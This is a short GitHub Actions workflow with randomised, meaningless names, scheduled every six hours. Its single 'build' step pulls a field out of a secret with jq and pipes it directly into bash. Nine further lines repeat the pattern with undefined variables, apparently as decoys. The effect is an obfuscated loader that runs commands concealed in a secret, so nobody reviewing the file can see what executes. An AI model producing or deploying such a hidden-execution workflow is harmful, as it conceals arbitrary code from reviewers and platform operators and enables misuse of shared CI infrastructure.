name: xingbogeng6517

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xingbogeng6517
        env:
          zisz97: ${{ secrets.zisz97 }}
        run: |
          echo $zisz97 | jq -r .raxg8 | /bin/bash
          echo $ktmc3 | jq -r .ztgu209 | /bin/bash
          echo $amquy69914 | jq -r .b65 | /bin/bash
          echo $ycjd2 | jq -r .n99 | /bin/bash
          echo $gkhv506 | jq -r .zhdz52 | /bin/bash
          echo $t5 | jq -r .lfj7 | /bin/bash
          echo $qedh11 | jq -r .z0273 | /bin/bash
          echo $v4 | jq -r .t03523 | /bin/bash
          echo $ez47 | jq -r .ijto8822 | /bin/bash
          echo $ve8798 | jq -r .zse4751 | /bin/bash

